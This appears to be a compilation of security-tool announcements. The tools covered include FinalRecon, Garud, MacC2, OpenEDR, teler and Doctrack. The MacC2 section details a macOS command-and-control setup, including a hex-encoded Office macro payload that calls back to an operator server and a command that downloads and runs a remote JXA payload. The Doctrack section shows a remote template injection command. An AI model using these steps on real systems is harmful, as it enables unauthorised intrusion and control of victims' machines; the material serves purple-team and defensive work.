
FinalRecon v1.1.0 - The Last Web Recon Tool You'll Need



FinalRecon is an automatic web reconnaissance tool written in Python. The goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another, it provides similar results while keeping dependencies small and simple.


Features

FinalRecon provides detailed information such as:

  • Header Information
  • Whois
  • SSL Certificate Information
  • Crawler
    • HTML
      • CSS
      • JavaScript
      • Internal Links
      • External Links
      • Images
    • robots
    • sitemaps
    • Links inside Javascripts
    • Links from Wayback Machine from Last 1 Year
  • DNS Enumeration
    • A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records
    • DMARC Records
  • Subdomain Enumeration
    • Data Sources
      • BuffOver
      • crt.sh
      • ThreatCrowd
      • AnubisDB
      • ThreatMiner
      • Facebook Certificate Transparency API
        • Auth Token is Required for this source, read Configuration below
  • Traceroute
    • Protocols
      • UDP
      • TCP
      • ICMP
  • Directory Searching
    • Support for File Extensions
    • Directories from Wayback Machine from Last 1 Year
  • Port Scan
    • Fast
    • Top 1000 Ports
    • Open Ports with Standard Services
  • Export
    • Formats
      • txt
      • xml
      • csv

Configuration

API Keys

Some modules use API keys to fetch data from different resources. These keys are optional; if you are not using an API key, the source is simply skipped. If you are interested in using these resources, you can store your API key in the keys.json file.

Path --> finalrecon/conf/keys.json

If you don't want to use a key for a certain data source, just set its value to null; by default, the values of all available data sources are null.
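For example, a minimal keys.json with the Facebook source left disabled would look like this (same key name as the example below):

{
"facebook": null
}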


Facebook Developers API

This data source is used to fetch Certificate Transparency data which is used in Sub Domain Enumeration

Key Format : APP-ID|APP-SECRET

Example :

{
"facebook": "9go1kx9icpua5cm|20yhraldrxt6fi6z43r3a6ci2vckkst3"
}

Read More : https://developers.facebook.com/docs/facebook-login/access-tokens


Tested on
  • Kali Linux
  • BlackArch Linux

FinalRecon is a tool for pentesters and is designed for Linux-based operating systems; other platforms like Windows and Termux are NOT supported.


Installation

BlackArch Linux
pacman -S finalrecon

SecBSD
doas pkg_add finalrecon

Kali Linux
git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt

Docker
docker pull thewhiteh4t/finalrecon
docker run -it --entrypoint /bin/sh thewhiteh4t/finalrecon

Usage
python3 finalrecon.py -h

usage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub]
                     [--trace] [--dir] [--ps] [--full] [-t T] [-T T] [-w W] [-r] [-s]
                     [-sp SP] [-d D] [-e E] [-m M] [-p P] [-tt TT] [-o O]
                     url

FinalRecon - The Last Web Recon Tool You Will Need | v1.1.0

positional arguments:
  url         Target URL

optional arguments:
  -h, --help  show this help message and exit
  --headers   Header Information
  --sslinfo   SSL Certificate Information
  --whois     Whois Lookup
  --crawl     Crawl Target
  --dns       DNS Enumeration
  --sub       Sub-Domain Enumeration
  --trace     Traceroute
  --dir       Directory Search
  --ps        Fast Port Scan
  --full      Full Recon

Extra Options:
  -t T        Number of Threads [ Default : 30 ]
  -T T        Request Timeout [ Default : 30.0 ]
  -w W        Path to Wordlist [ Default : wordlists/dirb_common.txt ]
  -r          Allow Redirect [ Default : False ]
  -s          Toggle SSL Verification [ Default : True ]
  -sp SP      Specify SSL Port [ Default : 443 ]
  -d D        Custom DNS Servers [ Default : 1.1.1.1 ]
  -e E        File Extensions [ Example : txt, xml, php ]
  -m M        Traceroute Mode [ Default : UDP ] [ Available : TCP, ICMP ]
  -p P        Port for Traceroute [ Default : 80 / 33434 ]
  -tt TT      Traceroute Timeout [ Default : 1.0 ]
  -o O        Export Output [ Default : txt ] [ Available : xml, csv ]
# Check headers

python3 finalrecon.py --headers <url>

# Check SSL certificate

python3 finalrecon.py --sslinfo <url>

# Check WHOIS information

python3 finalrecon.py --whois <url>

# Crawl Target

python3 finalrecon.py --crawl <url>

# Directory Searching

python3 finalrecon.py --dir <url> -e txt,php -w /path/to/wordlist

# Full recon

python3 finalrecon.py --full <url>
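The modules and extra options can be combined freely; a hedged example run (target and option values are placeholders):

# Full recon with a shorter timeout, a custom DNS server and CSV export

python3 finalrecon.py --full https://example.com -T 15 -d 8.8.8.8 -o csv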

Demo






Go_Parser - Yet Another Golang Binary Parser For IDAPro



Yet Another Golang Binary Parser For IDAPro

NOTE:

This master branch is written in Python 2 for IDAPython, and tested only on IDA 7.2/IDA 7.0. If you use IDAPython with Python 3 and a higher version of IDA Pro, please use the Python3 branch of go_parser.

Inspired by golang_loader_assist and jeb-golang-analyzer, I wrote a more complete Go binary parsing tool for IDA Pro.


Main Features:
  1. Locate and parse the firstmoduledata structure in a Go binary file, and comment each field;
  2. Locate the pclntab (PC Line Table) according to firstmoduledata and parse it, then find, parse, and recover the function names and source file paths in the pclntab. Source file paths are printed in the IDA Pro output window;
  3. Parse strings and string pointers, comment each string, and add a data reference for each string pointer;
  4. According to firstmoduledata, find and parse each type, and comment each attribute of the type, which is very convenient when a malware researcher analyzes a complex type or data structure definition;
  5. Parse the itab (Interface Table).

Helpful information for RE work on Go binaries:



And there are two useful features in go_parser:

  1. It also works fine for binaries with malformed file header information, especially malformed section header information;
  2. All the features above are valid for binaries built with buildmode=pie.

As an example, the parsing result for a config data structure in DDGMiner v5029 (MD5: 95199e8f1ab987cd8179a60834644663) is shown below:



And the user-defined source file paths list:



Project files:
  • go_parser.py: Entry file; press [Alt+F7], then select and execute this file;
  • common.py: Common variables and functions definition;
  • pclntbl.py: Parse the pclntab (PC Line Table);
  • strings.py: Parse strings and string pointers;
  • moduldata.py: Parse firstmoduledata;
  • types_builder.py: Parse types;
  • itab.py: Parse the itab (Interface Table).

Additionally, str_ptr.py will parse string pointers by manually specifying the start and end addresses of the string pointers.


Note
  1. This branch is written in Python 2 for IDAPython, and tested only on IDA 7.2/IDA 7.0;
  2. The strings parsing module was migrated from golang_loader_assist, and I added string pointer parsing. It only supports the x86 (32-bit & 64-bit) architecture for now.

Refer
  1. Analyzing Golang Executables
  2. Reversing GO binaries like a pro
  3. Reconstructing Program Semantics from Go binaries.pdf
  4. Reverse Engineering Go Binaries from Basics to Advanced: Overview
  5. Reverse Engineering Go Binaries from Basics to Advanced: MetaInfo, Function Symbols and Source File Path List
  6. Reverse Engineering Go Binaries from Basics to Advanced: Data Types
  7. Reverse Engineering Go Binaries from Basics to Advanced: itab and strings
  8. Reverse Engineering Go Binaries from Basics to Advanced: Tips and Real-World Cases


Garud - An Automation Tool That Scans Sub-Domains, Sub-Domain Takeover And Then Filters Out XSS, SSTI, SSRF And More Injection Point Parameters



An automation tool that scans for subdomains and subdomain takeover, and then filters out XSS, SSTI, SSRF and other injection point parameters.



git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud && mv garud /usr/local/bin/
  • Usage
garud -d target.com -f filename

About Garud

I made this tool to automate my recon and save time. It always gave me a headache to type such commands one by one and wait for each to complete before typing the next. So I collected some of the tools that are widely used in the bug bounty field. In this script I used Assetfinder, get-title, httprobe, subjack, subzy, Sublist3r, gau and gf patterns.
The script first enumerates all the subdomains of the given target domain using assetfinder and Sublist3r, then filters the live domains out of the whole subdomain list, then extracts the titles of the subdomains using get-title, and then scans for subdomain takeover using subjack and subzy. Next it uses gau to extract the parameters of the given subdomains and gf patterns to filter out XSS, SSTI, SSRF and SQLi params from those subdomains, as sketched below. All output is saved to text files such as target-xss.txt.
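As a rough sketch, the core of the workflow described above looks like this (tool flags may differ between versions):

# Enumerate subdomains, probe for live hosts, then mine URLs for XSS-prone params
assetfinder --subs-only target.com | sort -u > subs.txt
cat subs.txt | httprobe > live.txt
cat subs.txt | gau | gf xss > target-xss.txt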


Thanks to the authors of the tools used in this script.

@aboul3la, @tomnomnom, @lc, @LukaSikic, @haccer

Warning: This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.



MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities



MacC2 is a macOS post-exploitation tool written in Python that uses Objective-C calls or Python libraries as opposed to command line executions. The client is written in Python 2, which, though deprecated, is still shipped with base Big Sur installs. Apple plans to eventually remove Python 2 (or Python altogether) from base macOS installs, but as of Nov 2020 this is not the case. I wrote this tool to aid purple team exercises aimed at building detections for Python-based post-exploitation frameworks on macOS.


You can set up the server locally, or you can use the Docker setup included in this repo. Instructions below:


Instructions for Running Using Docker:

If you do not already have docker set up:

  1. chmod +x install_docker_linux.sh
  2. sudo ./install_docker_linux.sh

Next:

  1. chmod +x setup.sh
  2. sudo ./setup.sh (this will create an untrusted SSL cert and key, generate a macro file for the server and port you specify (the macro is dropped locally in macro.txt), build macc2-docker, and run the MacC2 server inside of macc2-container in interactive mode)
  3. when prompted, enter the IP/hostname of the MacC2 server

  4. when prompted, enter the port that the MacC2 server will listen on

  5. A hex encoded macro payload will be dropped locally in a file named macro.txt that is configured to connect to your MacC2 server on the hostname/IP and port you specified.

  6. Docker will install the aiohttp python3 dependency, build macc2-docker, and run the MacC2 server in a container named macc2-container. Once finished, the MacC2 server will listen on the specified port:

  7. You can run docker ps and validate that the MacC2 server is running (you will see a container named macc2-container listed there)

Note: Since I am using a static container name (macc2-container), if you run this setup more than once on the same server you will need to delete the macc2-container after each use, or else you will get the error "The container name "/macc2-container" is already in use by container". You can run the command below to delete the macc2-container after each run:

docker rm macc2-container

You can then either copy the MacC2_client.py file over to the client and execute it for a callback, or import the macro.txt macro into an Office document and "Enable Macros" when opening it for a callback on the client.


Running Locally (Without Using Docker)

If you opt to not use docker, you can set up the server locally using the steps below:

Since the MacC2 server uses the aiohttp library for communications, you will need to install aiohttp first:

pip install aiohttp (if you encounter an error, ensure that pip is pointing to python3, since aiohttp is a python3 library):

python3 -m pip install --upgrade --force pip

On C2 Server:

  1. Set up ssl (note: use a key size of at least 2048)

If you do not have your own cert, you can use the following to generate a self-signed cert:

  • 1: openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key
  • 2: openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem

note: the server script is hard-coded to use ca.pem and ca.key, so keep these names the same for now, or change the code appropriately
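To confirm the generated certificate meets the key size note above, you can inspect it (standard openssl usage):

openssl x509 -in ca.pem -noout -text | grep 'Public-Key'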

  2. Use macro_generator.py to create the MacC2 scripts with the server's IP/domain and port. macro_generator.py also builds a macro (macro.txt) that uses hex encoding to run MacC2. You can copy and paste the contents of macro.txt into an MS Office document:

Usage:

python3 macro_generator.py -s [C2 Server IP/domain] -p [C2 Server Port]

Example:


  3. Start the generated MacC2_server.py script to listen for a connection:


On Client Side (the target mac host):

  1. If you do not want to be limited by the mac sandbox and want more functionality, you may opt to copy the MacC2_client.py script to the client (assuming you have access).
  2. On the client, run the MacC2_client.py script: python MacC2_client.py


  3. On the server, you will see an inbound connection. Example below:


Using MacC2

After you receive a connection, you can use the "help" command on the server to get a list of the built-in commands available. After entering a command and pressing Enter, the command is queued up (this allows you to enter multiple commands to be executed by the client). Once you type "done" and hit Enter, all of the queued commands are sent to the client for execution.


 

Each command is pretty straightforward. The command options that are not OPSEC safe (i.e., that use command line executions or cause pop-ups) are flagged in red in the help menu.

Functions of Note:

  • You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server. Then you can provide the URL of the hosted file to MacC2 using the runjxa command to have MacC2 download and execute the Mythic JXA payload:

>>> runjxa <url_to_JXA_.js_payload>

Note: If you gain access using the MS Office macro, the persistence method will not work due to sandboxing. The files will still be dropped and the login item will still be inserted, but upon reboot the quarantine attribute prevents the persistence from executing.


Additional Info

The MacC2 server uses aiohttp to easily allow for asynchronous web comms. To ensure that only MacC2 agents can access the server, the server includes the following:

  • A specific user agent string check (if a request fails this check it receives a 404 Not Found)
  • A specific token (if a request fails this check it receives a 404 Not Found)

The operator flow after setting everything up and getting a callback is:

  • view help menu for command options
  • enter command name and press enter for each command you want to run
  • enter "done" and press enter to have the queued commands sent to the client for execution
  • NOTE: The default sleep is 10 seconds. The operator can change that by using the sleep [numberofseconds] command.
  • NOTE: The MacC2 server currently does not have a way to conveniently switch between sessions when multiple clients connect. Instead the server auto switches between sessions after each command executed. So the operator will need to pay attention to the IP in the connection to know which session is being interacted with.

Macro Limitations

MacC2 does NOT include any sandbox escapes and therefore all functions do not work when access is gained via the Office macro. Functions that DO work from the sandbox include:

  • runjxa
  • systeminfo
  • persist: MacC2 can drop files to disk from a sandboxed macro payload. However, upon reboot the persistence will not execute due to the quarantine attribute on the dropped files.
  • addresses
  • prompt
  • clipboard
  • shell (not OPSEC safe)
  • spawn (not OPSEC safe)
  • cd and listdir (sandbox prevents access for most directories but you can see the root '/' directory and potentially others as well)

DISCLAIMER

This is for academic purposes and should not be used maliciously or without the appropriate authorizations and approvals.



Gping - Ping, But With A Graph



Ping, but with a graph.


Install

FYI: The old Python version can be found under the python tag.


Homebrew (macOS + Linux)
brew tap orf/brew
brew install gping

Binaries (Windows)

Download the latest release from the GitHub releases page. Extract it and move it to a directory on your PATH.


Cargo

cargo install gping


Usage

Just run gping [host].

$ gping --help
gping 0.1.7
Ping, but with a graph.

USAGE:
    gping [OPTIONS] <hosts>...

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information

OPTIONS:
    -b, --buffer <buffer>    Determines the number of pings to display. [default: 100]

ARGS:
    <hosts>...    Hosts or IPs to ping
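Multiple hosts can be graphed side by side; a quick example (hosts and buffer size are placeholders):

$ gping -b 200 google.com 1.1.1.1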


Rehex - Reverse Engineers' Hex Editor



A cross-platform (Windows, Linux, Mac) hex editor for reverse engineering, and everything else.


Features
  • Large (1TB+) file support
  • Decoding of integer/floating point value types
  • Disassembly of machine code
  • Highlighting and annotation of ranges of bytes
  • Side by side comparison of selections




Installation

The Releases page has standalone packages for Windows and Mac, as well as installable packages for popular Linux distributions; alternatively, you can install from a distribution package repository as described below.

The same packages are also produced for Git commits (look for the tick), if you want to try the development/unreleased versions.


Debian

First, you will need to add my APT signing key to your system:

wget -qO - https://repos.solemnwarning.net/debian-key.gpg | sudo apt-key add -

Add the following lines to your /etc/apt/sources.list file:

deb http://repos.solemnwarning.net/debian/ CODENAME main
deb-src http://repos.solemnwarning.net/debian/ CODENAME main

Replace CODENAME with the version you're running (e.g. buster or stretch).

Finally, you can install the package:

$ sudo apt-get update
$ sudo apt-get install rehex

Ubuntu

First, you will need to add my APT signing key to your system:

wget -qO - https://repos.solemnwarning.net/ubuntu-key.gpg | sudo apt-key add -

Add the following lines to your /etc/apt/sources.list file:

deb http://repos.solemnwarning.net/ubuntu/ CODENAME main
deb-src http://repos.solemnwarning.net/ubuntu/ CODENAME main

Replace CODENAME with the version you're running (e.g. groovy for 20.10 or focal for 20.04).

Finally, you can install the package:

$ sudo apt-get update
$ sudo apt-get install rehex

NOTE: Ubuntu users must have the "Universe" package repository enabled to install some of the dependencies.


Fedora
$ sudo dnf copr enable solemnwarning/rehex
$ sudo dnf install rehex

CentOS
$ sudo dnf install epel-release
$ sudo dnf copr enable solemnwarning/rehex
$ sudo dnf install rehex

openSUSE
$ sudo zypper ar obs://editors editors
$ sudo zypper ref
$ sudo zypper in rehex

Building

If you want to compile on Linux, just check out the source and run make. You will need Jansson, wxWidgets and Capstone installed, along with their development packages (install build-essential, git, libwxgtk3.0-dev, libjansson-dev and libcapstone-dev on Ubuntu).

The resulting build can be installed using make install, which accepts all the standard environment variables.
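Putting the Linux steps together, a minimal sketch (the repository URL here is an assumption, not taken from this page):

$ sudo apt-get install build-essential git libwxgtk3.0-dev libjansson-dev libcapstone-dev
$ git clone https://github.com/solemnwarning/rehex.git
$ cd rehex
$ make
$ sudo make install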

For Windows or Mac build instructions, see the relevant README: README.Windows.md / README.OSX.md


Feedback

If you find any bugs or have suggestions for improvements or new features, please open an issue on GitHub, or join the #rehex IRC channel on irc.freenode.net.



OpenEDR - Open EDR Public Repository



We at OpenEDR believe in creating a cybersecurity platform with its source code openly available to the public, where products and services can be provisioned and managed together. EDR is our starting point. OpenEDR is a full-blown EDR capability. It is one of the most sophisticated and effective EDR code bases in the world, and with the community's help it will become even better.


OpenEDR is free and its source code is open to the public. OpenEDR allows you to analyze what's happening across your entire environment at base-security-event level. This granularity enables the accurate root-cause analysis needed for faster and more effective remediation. Proven to be the best way to convey this type of information, process hierarchy tracking provides more than just data; it offers actionable knowledge. It collects all the details on endpoints, hashes, and base and advanced events. You get detailed file and device trajectory information and can navigate single events to uncover a larger issue that may be compromising your system.

OpenEDR's security architecture simplifies breach detection, protection and visibility by working for all threat vectors without requiring any other agent or solution. The agent records all telemetry information locally and then sends the data to locally hosted or cloud-hosted Elasticsearch deployments. Real-time visibility and continuous analysis are the vital elements of the entire endpoint security concept. OpenEDR enables you to perform analysis of what's happening across your environment at base-event-level granularity. This allows accurate root cause analysis leading to better remediation of your compromises. The integrated security architecture of OpenEDR delivers full attack vector visibility, including the MITRE framework.

The Open EDR consists of the following components:

  • Runtime components
    • Core Library – the basic framework;
    • Service – service application;
    • Process Monitor – components for per-process monitoring;
      • Injected DLL – the library which is injected into different processes and hooks API calls;
      • Loader for Injected DLL – the driver component which loads injected DLL into each new process
      • Controller for Injected DLL – service component for interaction with Injected DLL;
    • System Monitor – the generic container for different kernel-mode components;
    • File-system mini-filter – the kernel component that hooks file system I/O requests;
    • Low-level process monitoring component – monitors processes creation/deletion using system callbacks
    • Low-level registry monitoring component – monitors registry access using system callbacks
    • Self-protection provider – prevents EDR components and configuration from unauthorized changes
    • Network monitor – network filter for monitoring the network activity;
  • Installer

Generic high-level interaction diagram for runtime components 


For details you can refer here: https://techtalk.comodo.com/2020/09/19/open-edr-components/


Build Instructions

You should have Microsoft Visual Studio to build the code

  • Microsoft Visual Studio Solution File is under /openedr/edrav2/build/vs2019/
  • All OpenEDR Projects are in /openedr/edrav2/iprj folder
  • All external Projects and Libraries are in /openedr/edrav2/eprj folder

Libraries Used:

Roadmap

Please refer here for the project roadmap: https://github.com/ComodoSecurity/openedr_roadmap/projects/1


Installation Instructions

OpenEDR is a single agent that can be installed on Windows endpoints. It generates extensible telemetry data covering all security-relevant events. It also uses the file lookup, analysis and verdict systems from Comodo, https://valkyrie.comodo.com/. You can also get your own account and free license there.

The telemetry data is stored locally on the endpoint itself. You can use any log streaming and analysis platform. Here we present how you can do remote streaming and analysis via open source tools like Elasticsearch and Filebeat.


OpenEDR :

The OpenEDR project releases installer MSIs signed by Comodo Security Solutions. The default installation folder is C:\Program Files\OpenEdr\EdrAgentV2. Currently there are not many options to edit/configure the rule set, alerts, etc.; those will come with upcoming releases.

The agent writes its output to C:\ProgramData\edrsvc\log\output_events by default; there you will see the EDR telemetry data, which you should point Filebeat or another log streaming solution at.


Elasticsearch:

There are multiple options to run Elasticsearch: you can install and run it on your own machine or in your data center, or use the Elasticsearch service of public cloud providers like AWS and GCP. If you want to run Elasticsearch yourself, refer to the installation instructions for various platforms: https://www.elastic.co/guide/en/elasticsearch/reference/current/install-elasticsearch.html

Another option is using Docker; this also enables a quick start for a PoC and can later be extended into a production environment as well. You can access the guide for this setup here: https://www.elastic.co/guide/en/elasticsearch/reference/7.10/docker.html


Filebeat:

Filebeat is a very good option for transferring OpenEDR output to Elasticsearch; you need to install Filebeat on each system you want to monitor. Overall instructions can be found here: https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html

We don't have an OpenEDR Filebeat module yet, so you need to configure a custom input option for Filebeat, as sketched below: https://www.elastic.co/guide/en/beats/filebeat/current/configuration-filebeat-options.html
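As a rough sketch, such a custom input could look like the following filebeat.yml fragment, assuming the default output directory above and a placeholder Elasticsearch host:

filebeat.inputs:
  - type: log
    paths:
      - 'C:\ProgramData\edrsvc\log\output_events\*'

output.elasticsearch:
  hosts: ["your-elasticsearch-host:9200"]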


Releases

https://github.com/ComodoSecurity/openedr/releases/tag/2.0.0.0


Screenshots

How OpenEDR integration with a platform looks, and a showcase of OpenEDR's capabilities:

Detection / Alerting



Event Details



Dashboard



Process Timeline



Process Treeview



Event Search






Teler - Real-time HTTP Intrusion Detection



teler is a real-time intrusion detection and threat alert tool based on web logs that runs in a terminal, using resources that are collected and provided by the community.


Features
  • Real-time: Analyze logs and identify suspicious activity in real-time.

  • Alerting: teler provides alerting when a threat is detected, push notifications include Slack, Telegram and Discord.

  • Monitoring: We have our own metrics if you want to monitor threats easily, and we use Prometheus for that.

  • Latest resources: The collections are continuously kept up-to-date.

  • Minimal configuration: You can just run it against your log file, write the log format and let teler analyze the log and show you alerts!

  • Flexible log formats: teler allows any custom log format string! It all depends on how you write the log format in configuration file.

  • Incremental log processing: Need data persistence rather than buffer stream? teler has the ability to process logs incrementally through the on-disk persistence options.


Why teler?

teler was designed to be a fast, terminal-based threat analyzer. Its core idea is to quickly analyze and hunt threats in real time!


Installation

from Binary

The installation is easy. You can download a prebuilt binary from the releases page, unpack it, and run! Or install with:

▶ curl -sSfL 'https://ktbs.dev/get-teler.sh' | sh -s -- -b /usr/local/bin

using Docker

Pull the Docker image by running:

▶ docker pull kitabisa/teler

from Source

If you have a go1.14+ compiler installed and configured:

▶ GO111MODULE=on go get -v -u ktbs.dev/teler/cmd/teler

In order to update the tool, you can use the -u flag with the go get command.


from GitHub
▶ git clone https://github.com/kitabisa/teler
▶ cd teler
▶ make build
▶ mv ./bin/teler /usr/local/bin

Usage

Simply, teler can be run with:

▶ [buffers] | teler -c /path/to/config/teler.yaml
# or
▶ teler -i /path/to/access.log -c /path/to/config/teler.yaml

If you've built teler with a Docker image:

▶ [buffers] | docker run -i --rm -e TELER_CONFIG=/path/to/config/teler.yaml teler
# or
▶ docker run -i --rm -e TELER_CONFIG=/path/to/config/teler.yaml teler --input /path/to/access.log

Flags
▶ teler -h

This will display help for the tool.


 

Here are all the switches it supports.

Flag              Description                                                     Examples
-c, --config      teler configuration file                                        kubectl logs nginx | teler -c /path/to/config/teler.yaml
-i, --input       Analyze logs from data persistence rather than buffer stream    teler -i /var/log/nginx/access.log
-x, --concurrent  Set the concurrency level to analyze logs (default: 20)         tail -f /var/log/nginx/access.log | teler -x 50
-o, --output      Save detected threats to file                                   teler -i /var/log/nginx/access.log -o /tmp/threats.log
--json            Display threats in the terminal as JSON format                  teler -i /var/log/nginx/access.log --json
--rm-cache        Remove all cached resources                                     teler --rm-cache
-v, --version     Show current teler version                                      teler -v

Config

The -c flag specifies the teler configuration file.

▶ tail -f /var/log/nginx/access.log | teler -c /path/to/config/teler.yaml

This is required, but if you have defined the TELER_CONFIG environment variable you don't need to use this flag, e.g.:

▶ export TELER_CONFIG="/path/to/config/teler.yaml"
▶ tail -f /var/log/nginx/access.log | teler
# or
▶ tail -f /var/log/nginx/access.log | TELER_CONFIG="/path/to/config/teler.yaml" teler

Input

Need to analyze logs incrementally? The -i flag is useful for that.

▶ teler -i /var/log/nginx/access.log

Concurrency

Concurrency is the number of logs analyzed at the same time. The default value teler provides is 20; you can change it by using the -x flag.

▶ teler -i /var/log/nginx/access.log -x 50

Output

You can also save the detected threats into a file with -o flag.

▶ teler -i /var/log/nginx/access.log -o threats.log

JSON Format

If you want to display the detected threats in JSON format, switch it on with the --json flag.

▶ teler -i /var/log/nginx/access.log --json

Please note this also applies if you save the output to a file with the -o flag.


Remove Caches

This removes all stored resources in the user-level cache directory, see cache.

▶ teler --rm-cache

Configuration

teler requires a minimum of configuration to process and analyze logs and to execute threat detection and alerts. See teler.example.yaml for an example.


Log Formats

Because we use the gonx package to parse the log, you can write any log format. As an example:


Apache
log_format: |
  $remote_addr - $remote_user [$time_local] "$request_method $request_uri $request_protocol" $status $body_bytes_sent

Nginx
log_format: |
  $remote_addr $remote_user - [$time_local] "$request_method $request_uri $request_protocol"
  $status $body_bytes_sent "$http_referer" "$http_user_agent"

Nginx Ingress
log_format: |
  $remote_addr - [$remote_addr] $remote_user - [$time_local]
  "$request_method $request_uri $request_protocol" $status $body_bytes_sent
  "$http_referer" "$http_user_agent" $request_length $request_time
  [$proxy_upstream_name] $upstream_addr $upstream_response_length $upstream_response_time $upstream_status $req_id

Amazon S3
log_format: |
  $bucket_owner $bucket [$time_local] $remote_addr $requester $req_id $operation $key
  "$request_method $request_uri $request_protocol" $status $error_code $body_bytes_sent -
  $total_time - "$http_referer" "$http_user_agent" $version_id $host_id
  $signature_version $cipher_suite $http_auth_type $http_host_header $tls_version

Elastic LB
log_format: |
  $time_local $elb_name $remote_addr $upstream_addr $request_processing_time
  $upstream_processing_time $response_processing_time $status $upstream_status $body_received_bytes $body_bytes_sent
  "$request_method $request_uri $request_protocol" "$http_user_agent" $cipher_suite $tls_version

CloudFront
log_format: |
  $date $time $edge_location $body_bytes_sent $remote_addr
  $request_method $http_host_header $request_uri $status
  $http_referer $http_user_agent $request_query $http_cookie $edge_type $req_id
  $http_host_header $ssl_protocol $body_bytes_sent $response_processing_time $http_host_forwarded
  $tls_version $cipher_suite $edge_result_type $request_protocol $fle_status $fle_encrypted_fields
  $http_port $time_first_byte $edge_detail_result_type
  $http_content_type $request_length $request_length_start $request_length_end

Threat rules

Cache

By default, teler fetches external resources every time you run it, but you can choose whether or not external resources are cached.

rules:
  cache: true

If you choose to cache resources, they are stored under the cross-platform user-level cache directory and updated every day, see resources.


Excludes

We include resources for predetermined threats, including:

  • Common Web Attack
  • Bad IP Address
  • Bad Referrer
  • Bad Crawler
  • Directory Bruteforce

You can disable any type of threat in the excludes configuration (case-sensitive).

rules:
  threat:
    excludes:
      - "Bad IP Address"

With the above configuration, teler detects all threat types except bad IP addresses, and will not analyze logs or send alerts for that type.


Whitelists

You can also add whitelists to teler configuration.

rules:
  threat:
    whitelists:
      - "(curl|Go-http-client|okhttp)/*"
      - "^/wp-login\\.php"

Whitelists cover the entire HTTP request and are processed as regular expressions, so please write them with caution!


Notification

We provide the following alert notification options:

  • Slack
  • Telegram
  • Discord

Configure the notification alerts needed in:

notifications:
  slack:
    token: "xoxb-..."
    color: "#ffd21a"
    channel: "G30SPKI"

  telegram:
    token: "123456:ABC-DEF1234...-..."
    chat_id: "-111000"

  discord:
    token: "NkWkawkawkawkawka.X0xo.n-kmZwA8aWAA"
    color: "16312092"
    channel: "700000000000000..."

You can also choose to disable alerts, or select where the alerts are sent:

alert:
  active: true
  provider: "slack"

Metrics

teler also supports metrics using Prometheus.


Prometheus

You can configure the host, port and endpoint to use Prometheus metrics in the configuration file.

prometheus:
  active: true
  host: "localhost"
  port: 9099
  endpoint: "/metrics"
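With those settings you can verify the exporter with a plain HTTP request (host, port and endpoint taken from the config above):

▶ curl http://localhost:9099/metrics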

Here are all the metrics we collect, categorized.

Metric                       Description
teler_threats_count_total    Total number of detected threats
teler_cwa                    Get lists of Common Web Attacks
teler_badcrawler             Get lists of Bad Crawler requests
teler_dir_bruteforce         Get lists of Directories Bruteforced
teler_bad_referrer           Get lists of Bad Referrer requests
teler_badip_count            Total number of Bad IP Addresses


Resources

All external resources used in teler are NOT provided by us. See all the people involved in these resources at the teler Resource Collections.





Kali Linux 2020.4 - Penetration Testing and Ethical Hacking Linux Distribution


 

Time for another Kali Linux release! – Kali Linux 2020.4. This release has various impressive updates:
  • ZSH is the new default shell – We said it was happening last time. Now it has. ZSH. Is. Now. Default.
  • Bash shell makeover – It may not function like ZSH, but now Bash looks like ZSH.
  • Partnership with tool authors – We are teaming up with byt3bl33d3r.
  • Message at login – Proactively pointing users to resources.
  • AWS image refresh – Now on GovCloud. Includes Kali's default (command line) tools again. And there is a new URL.
  • Packaging Guides – Want to start getting your tool inside of Kali? This should help.
  • New Tools & Updates – New kernel and various new tools and updates for existing ones, as well as setting Proxychains 4 as default.
  • NetHunter Updates – New NetHunter settings menu, select from different boot animations, and persistent Magisk.
  • Win-KeX 2.5 – New "Enhanced Session Mode" brings Win-KeX to ARM devices.
  • Vagrant & VMware – We now support VMware users who use Vagrant.


More info here.


Doctrack - Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)



Tool to manipulate and insert tracking pixels into Office Open XML documents.


Features
  • Insert tracking pixels into Office Open XML documents (Word and Excel)
  • Inject template URL for remote template injection attack
  • Inspect external target URLs and metadata
  • Create Office Open XML documents (#TODO)

Installation

You will need to download the .NET Core SDK for your platform. Then, to build a single binary on Windows:

$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

On Linux:

$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

Usage
$ doctrack --help
Tool to manipulate and insert tracking pixels into Office Open XML documents.
Copyright (C) 2020 doctrack

  -i, --input         Input filename.
  -o, --output        Output filename.
  -m, --metadata      Metadata to supply (json file)
  -u, --url           URL to insert.
  -e, --template      (Default: false) If set, enables template URL injection.
  -t, --type          Document type. If --input is not specified, creates new
                      document and saves as --output.
  -l, --list-types    (Default: false) Lists available types for document creation.
  -s, --inspect       (Default: false) Inspect external targets.
  --help              Display this help screen.

The available document types are listed below. If you want to insert a tracking URL, just use either the Document or Workbook types; the other types listed here are only for document creation (#TODO).

$ doctrack --list-types
Document (*.docx)
MacroEnabledDocument (*.docm)
MacroEnabledTemplate (*.dotm)
Template (*.dotx)
Workbook (*.xlsx)
MacroEnabledWorkbook (*.xlsm)
MacroEnabledTemplateX (*.xltm)
TemplateX (*.xltx)

Insert tracking pixel and change document metadata:

$ doctrack -t Document -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

Insert remote template URL (remote template injection attack), works only with Word documents:

$ doctrack -t Document -i test.docx -o test.docx --url http://test.url/template.dotm --template

Inspect external target URLs and metadata:

$ doctrack -t Document -i test.docx --inspect
[External targets]
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm
[Metadata]
Creator:
Title:
Subject:
Category:
Keywords:
Description:
ContentType:
ContentStatus:
Version:
Revision:
Created: 13.10.2020 23:20:39
